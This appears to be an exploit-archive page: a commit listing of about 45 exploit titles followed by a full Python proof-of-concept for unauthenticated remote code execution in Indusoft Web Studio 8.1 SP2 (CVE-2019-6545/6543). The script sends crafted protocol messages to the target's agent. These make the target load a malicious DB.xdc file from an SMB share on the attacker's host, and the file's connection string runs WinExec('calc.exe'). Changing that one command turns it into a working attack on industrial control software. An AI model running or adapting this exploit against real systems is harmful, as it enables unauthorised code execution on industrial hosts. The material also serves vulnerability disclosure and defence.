d622832ea0
21 changes to exploits/shellcodes KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH) Jzip - Buffer Overflow (Denial of Service) (SEH Unicode) Jzip - Buffer Overflow (PoC) (SEH Unicode) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite) STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC) STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite) Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service) Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH) Netatalk 3.1.12 - Authentication Bypass (PoC) IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC) Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC) IP-Tools 2.50 - Local Buffer Overflow (PoC) Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite) FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC) FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite) Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC) Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite) AirDroid 4.2.1.6 - Denial of Service FutureDj Pro 1.7.2.0 - Denial of Service NordVPN 6.19.6 - Denial of Service (PoC) River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH) IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH) Evince - CBT File Command Injection (Metasploit) Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure Netatalk - Bypass Authentication Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit) NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit) Indusoft Web Studio 8.1 SP2 - Remote Code Execution Smoothwall Express 3.1-SP4 - Cross-Site Scripting Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset IPFire 2.21 - Cross-Site Scripting MyBB Bans List 1.0 - Cross-Site Scripting VA MAX 8.3.4 - Authenticated Remote Code Execution CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting Webiness Inventory 2.3 - 'email' SQL Injection
136 lines
No EOL
4.4 KiB
Python
Executable file
136 lines
No EOL
4.4 KiB
Python
Executable file
##
|
|
# Exploit Title: Indusoft Web Studio Unauthenticated RCE
|
|
# Date: 02/04/2019
|
|
# Exploit Author: Jacob Baines
|
|
# Vendor Homepage: http://www.indusoft.com/
|
|
# Software http://www.indusoft.com/Products-Downloads/Download-Library
|
|
# Version: 8.1 SP2 and below
|
|
# Tested on: Windows 7 running the Web Studio 8.1 SP2 demo app
|
|
# CVE : CVE-2019-6545 CVE-2019-6543
|
|
# Advisory:
|
|
https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec133.pdf?hsLang=en
|
|
# Advisory: https://ics-cert.us-cert.gov/advisories/ICSA-19-036-01
|
|
# Advisory: https://www.tenable.com/security/research/tra-2019-04
|
|
##
|
|
import argparse
|
|
import threading
|
|
import socket
|
|
from struct import *
|
|
import time
|
|
import sys
|
|
|
|
from impacket import smbserver
|
|
|
|
##
|
|
# The SMB Server function. Runs on its own thread.
|
|
# @param lip the listening IP address
|
|
##
|
|
def smb_server(lip):
|
|
server = smbserver.SimpleSMBServer(listenAddress=lip, listenPort=445)
|
|
server.addShare('LOLWAT', '.', '')
|
|
server.setSMBChallenge('')
|
|
server.setLogFile('/dev/null')
|
|
server.start()
|
|
|
|
##
|
|
# Converts a normal string to a utf 16 with a length field.
|
|
# @param s the string to convert
|
|
##
|
|
def wstr(s):
|
|
slen = len(s)
|
|
s = s.encode('utf_16_le')
|
|
|
|
out = '\xff\xfe\xff'
|
|
if slen < 0xff:
|
|
out += pack('<B', slen) + s
|
|
elif slen < 0xffff:
|
|
out += '\xff' + pack('<H', slen) + s
|
|
else:
|
|
out += '\xff\xff\xff' + pack('<L', slen) + s
|
|
|
|
return out
|
|
|
|
if __name__ == '__main__':
|
|
|
|
top_parser = argparse.ArgumentParser(description='test')
|
|
top_parser.add_argument('--cip', action="store", dest="cip",
|
|
required=True, help="The IPv4 address to connect to")
|
|
top_parser.add_argument('--cport', action="store", dest="cport",
|
|
type=int, help="The port to connect to", default="1234")
|
|
top_parser.add_argument('--lip', action="store", dest="lip",
|
|
required=True, help="The address to connect back to")
|
|
args = top_parser.parse_args()
|
|
|
|
# Connect to the remote agent
|
|
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
print "[+] Attempting connection to " + args.cip + ":" + str(args.cport)
|
|
sock.settimeout(15)
|
|
sock.connect((args.cip, args.cport))
|
|
print "[+] Connected!"
|
|
|
|
# spin up the SMB server thread
|
|
print "[+] Spinning up the SMB Server"
|
|
smb_thread = threading.Thread(target=smb_server, args=(args.lip, ))
|
|
smb_thread.daemon = True;
|
|
smb_thread.start()
|
|
|
|
# drop the xdc file
|
|
print "[+] Creating the DB.xdc file"
|
|
xdc = open("./DB.xdc", "w+")
|
|
xdc.write(
|
|
"<?xml version=\"1.0\"?>\n"
|
|
"<Connection>\n"
|
|
"\t<ConnectionString>{WinExec(\"calc.exe\")}</ConnectionString>\n"
|
|
"\t<User></User>\n"
|
|
"\t<TimeOut>2</TimeOut>\n"
|
|
"\t<LongTimeOut>5</LongTimeOut>\n"
|
|
"\t<HostName>127.0.0.1</HostName>\n"
|
|
"\t<TCPPort>3997</TCPPort>"
|
|
"\t<Flags>0</Flags>\n"
|
|
"\t<RetryInterval>120</RetryInterval>\n"
|
|
"</Connection>\n")
|
|
xdc.close()
|
|
|
|
print "[+] Sending the connection init message"
|
|
init_conn = "\x02\x31\x10\x31\x10\x38\x10\x31\x10\x31\x03"
|
|
sock.sendall(init_conn)
|
|
resp = sock.recv(1024)
|
|
print '<- ' + resp
|
|
|
|
# do a basic validation of the response
|
|
if (len(resp) > 0 and resp[len(resp) - 1] == '\x03'):
|
|
print "[+] Received an init response"
|
|
else:
|
|
print "[-] Invalid init response. Exiting..."
|
|
sock.close()
|
|
sys.exit(0)
|
|
|
|
# Craft command 66
|
|
cmd = wstr('CO') # options: EX, CO, CF, CC
|
|
cmd += wstr('\\\\' + args.lip + '\\LOLWAT\\DB') # file to load
|
|
cmd += wstr('')
|
|
cmd += wstr('')
|
|
cmd += wstr('')
|
|
cmd += wstr('lolwat')
|
|
cmd += pack('<L', 0x3e80)
|
|
cmd += pack('<L', 0)
|
|
cmd += pack('<L', 100)
|
|
cmd = '\x02\x42' + cmd + '\x03'
|
|
|
|
# Send it to the agent
|
|
print "[+] Sending command 66"
|
|
sock.sendall(cmd)
|
|
|
|
print "[+] Grabbing the command response"
|
|
resp = sock.recv(1024)
|
|
print '<- ' + resp
|
|
if resp.find("Format of the initialization string does not conform to
|
|
specification starting at index 0".encode('utf_16_le')) != -1:
|
|
print '[+] Success! We received the expected error message.'
|
|
else:
|
|
print '[-] Unexpected error message. Something went wrong.'
|
|
|
|
print '[+] Disconnecting'
|
|
sock.close()
|
|
print '[+] Wait while the agent disconnects from the SMB server...'
|
|
sys.exit(0) |